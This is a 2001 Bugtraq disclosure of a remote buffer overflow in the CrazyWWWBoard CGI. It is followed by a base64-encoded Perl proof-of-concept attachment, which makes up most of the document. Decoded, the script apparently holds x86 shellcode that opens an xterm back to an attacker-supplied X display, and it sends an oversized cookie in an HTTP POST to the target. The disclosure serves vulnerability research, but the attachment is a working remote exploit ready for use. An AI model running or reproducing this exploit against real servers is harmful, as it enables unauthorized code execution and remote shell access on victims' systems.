[19969] in bugtraq
Remote buffer overflow in CrazyWWWBoard.
daemon@ATHENA.MIT.EDU (teleh0r)
Sat Mar 31 20:26:23 2001
Content-Type: Multipart/Mixed; charset="iso-8859-1";
boundary="------------Boundary-00=_A2I2DLCMTNFX032YRX2X"
MIME-Version: 1.0
Message-ID: <01033115083400.01691@localhost.localdomain>
Date: Sat, 31 Mar 2001 15:08:34 +0000
Reply-To: teleh0r <teleh0r@DOGLOVER.COM>
From: teleh0r <teleh0r@DOGLOVER.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
--------------Boundary-00=_A2I2DLCMTNFX032YRX2X
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Dear, Bugtraq
"Just little bits of history repeating"
I have discovered a buffer overflow in CrazyWWWBoard Full Edition &&
CrazyWWWBoard Limited Edition.
This is NOT that same overflow as discovered by Jin Ho You, 01.30.2001
(http://www.securityfocus.com/archive/1/159387)
This overflow will allow for arbitrary code execution with the privileges of
the web server. The versions which have been tested are:
CrazyWWWBoard2000p4 for RedHat 6.0 and CrazyWWWBoard2000LEp5 for
RedHat 6.1.
Proof of Concept exploit attached.
Sincerely yours,
teleh0r
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
--------------Boundary-00=_A2I2DLCMTNFX032YRX2X
Content-Type: application/x-perl;
charset="iso-8859-1";
name="crazywwwb-exploit.pl"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="crazywwwb-exploit.pl"
IyEvdXNyL2Jpbi9wZXJsCgojIHwgUmVtb3RlIGJ1ZmZlciBvdmVyZmxvdyBleHBsb2l0IGZvciBD
cmF6eVdXV0JvYXJkCiMgfCBOb2JyZWFrIFRlY2hub2xvZ2llcyAtIHd3dy5jcmF6eXd3d2JvYXJk
LmNvbS8KIyB8IENvcHlyaWdodCAoYykgMjAwMSBieSA8dGVsZWgwckBkb2dsb3Zlci5jb20+CiMg
fCBBbGwgcmlnaHRzIHJlc2VydmVkLgojIHwKIyB8IGh0dHA6Ly93d3cuZGlnaXQtbGFicy5vcmcv
CiMgfCBVc2FnZTogJDAgLXQgdGFyZ2V0IC1hIGF0dGFja2VyIC1kIGRweSAtbyBvZmZzZXQKCnVz
ZSBHZXRvcHQ6OlN0ZDsgZ2V0b3B0cygndDphOmQ6bzonLCBcJWFyZ3MpOwp1c2UgU29ja2V0OwoK
aWYgKGRlZmluZWQoJGFyZ3N7J3QnfSkpIHsgJHRhcmdldCAgID0gJGFyZ3N7J3QnfTsgfQppZiAo
ZGVmaW5lZCgkYXJnc3snYSd9KSkgeyAkYXR0YWNrZXIgPSAkYXJnc3snYSd9OyB9CmlmIChkZWZp
bmVkKCRhcmdzeydkJ30pKSB7ICRkcHkgICAgICA9ICRhcmdzeydkJ307IH0KaWYgKGRlZmluZWQo
JGFyZ3N7J28nfSkpIHsgJG9mZnNldCAgID0gJGFyZ3N7J28nfTsgfQoKJHNoZWxsY29kZSA9ICMg
UmFpU2UgPHJhaXNlQHVuZGVyc2VjLmNvbT4KIlx4ZWJceDRmXHg1ZVx4MzFceGQyXHg4OFx4NTZc
eDE0XHg4OFx4NTZceDE4XHg4OFx4NTYiLgoiXHgyMVx4YjJceDJiXHgzMVx4YzlceGIxXHgwOVx4
ODBceDNjXHgzMlx4NGJceDc0XHgwNSIuCiJceDQyXHhlMlx4ZjdceGViXHgyYlx4ODhceDM0XHgz
Mlx4MzFceGQyXHg4OVx4ZjNceDg5Ii4KIlx4NzZceDM2XHg4ZFx4N2VceDE1XHg4OVx4N2VceDNh
XHg4ZFx4N2VceDE5XHg4OVx4N2UiLgoiXHgzZVx4OGRceDdlXHgyMlx4ODlceDdlXHg0Mlx4ODlc
eDU2XHg0Nlx4OGRceDRlXHgzNiIuCiJceDhkXHg1Nlx4NDZceDMxXHhjMFx4YjBceDBiXHhjZFx4
ODBceDMxXHhkYlx4ODlceGQ4Ii4KIlx4NDBceGNkXHg4MFx4ZThceGFjXHhmZlx4ZmZceGZmL3Vz
ci9YMTFSNi9iaW4veHRlcm0iLgoiOC11dDgtZGlzcGxheTgke2F0dGFja2VyfToke2RweX1LIjsK
CiMgUmVtZW1iZXIgdG8gYWxsb3cgJHRhcmdldCB0byBjb25uZWN0IHRvIHlvdXIgWCBieQojIHVz
aW5nIHhob3N0ICsgJHRhcmdldC4KCiRyZXR1cm4gPSAweGJmZmZmMmQ4OwokbGVuZ3RoID0gMzI0
OwokZWdnbGVuID0gNTAwMDsKCmlmICghKGRlZmluZWQoJHRhcmdldCAmJiAkYXR0YWNrZXIgJiYg
JGRweSkpKSB7CiAgICBkaWUoIlVzYWdlOiAkMCAtdCBcInRhcmdldFwiIC1hIFwiYXR0YWNrZXJc
IiAtZCBcImRweVwiXG4iKTsKfQoKcHJpbnQoIkFkZHJlc3M6IDB4Iiwgc3ByaW50ZignJWx4Jywg
KCRyZXR1cm4gKyAkb2Zmc2V0KSksICJcbiIpOwokbmV3X3JldCA9IHBhY2soJ2wnLCAoJHJldHVy
biArICRvZmZzZXQpKTsKCmZvciAoJGkgPSAwOyAkaSA8ICRsZW5ndGg7ICRpICs9IDQpIHsKICAg
ICRidWZmZXIgLj0gJG5ld19yZXQ7Cn0KCmZvciAoJGkgPSAwOyAkaSA8ICgkZWdnbGVuIC0gbGVu
Z3RoKCRzaGVsbGNvZGUpKTsgJGkrKykgewogICAgJGVnZyAuPSAnQSc7Cn0KCiRlZ2cgLj0gJHNo
ZWxsY29kZTsKCiRleHBsb2l0ID0KIlBPU1QgL2NnaS1iaW4vQ3JhenlXV1dCb2FyZC5jZ2kgSFRU
UC8xLjEKVXNlci1BZ2VudDogJGVnZwpIb3N0OiBsb2NhbGhvc3QKQWNjZXB0OiB0ZXh0L2h0bWws
IGltYWdlL3BuZywgaW1hZ2UvanBlZywgaW1hZ2UvZ2lmCkFjY2VwdC1FbmNvZGluZzogZGVmbGF0
ZSwgZ3ppcCwgeC1nemlwLCBpZGVudGl0eSwgKjtxPTAKUmVmZXJlcjogaHR0cDovL3RlbGVoMHIu
Y2piLm5ldC8KQ29va2llOiBJRD1nYWRtaW47IEFTQz0kYnVmZmVyCkNvbm5lY3Rpb246IEtlZXAt
QWxpdmUsIFRFClRFOiBkZWZsYXRlLCBnemlwLCBjaHVua2VkLCBpZGVudGl0eSwgdHJhaWxlcnMK
Q29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1s
ZW5ndGg6IDU1Cgptb2RlPWNlbnRlciZmdHlwZT02JmJhY2tkZXB0aD0xJklEPWdhZG1pbiZQQVNT
V09SRD0wMDAwIjsKCiRpYWRkciA9IGluZXRfYXRvbigkdGFyZ2V0KSAgICAgICAgICAgICAgICAg
IHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKJHBhZGRyID0gc29ja2FkZHJfaW4oODAsICRpYWRkcikg
ICAgICAgICAgICAgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG8gPSBnZXRwcm90b2J5bmFt
ZSgndGNwJykgICAgICAgICAgICAgICB8fCBkaWUoIkVycm9yOiAkIVxuIik7Cgpzb2NrZXQoU09D
S0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7
CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpICAgICAgICAgICAgICAgICAgICAgIHx8IGRpZSgiRXJy
b3I6ICQhXG4iKTsKc2VuZChTT0NLRVQsIiRleHBsb2l0XDAxNVwwMTIiLCAwKSAgICAgICAgICAg
fHwgZGllKCJFcnJvcjogJCFcbiIpOwpjbG9zZShTT0NLRVQpOwoKIyBUZXN0ZWQgb24gUmVkaGF0
IDYuMiAtIENyYXp5V1dXQm9hcmQyMDAwTEVwNSAtIE1hciAzMCAxOTo0Mzo0Mwo=
--------------Boundary-00=_A2I2DLCMTNFX032YRX2X--
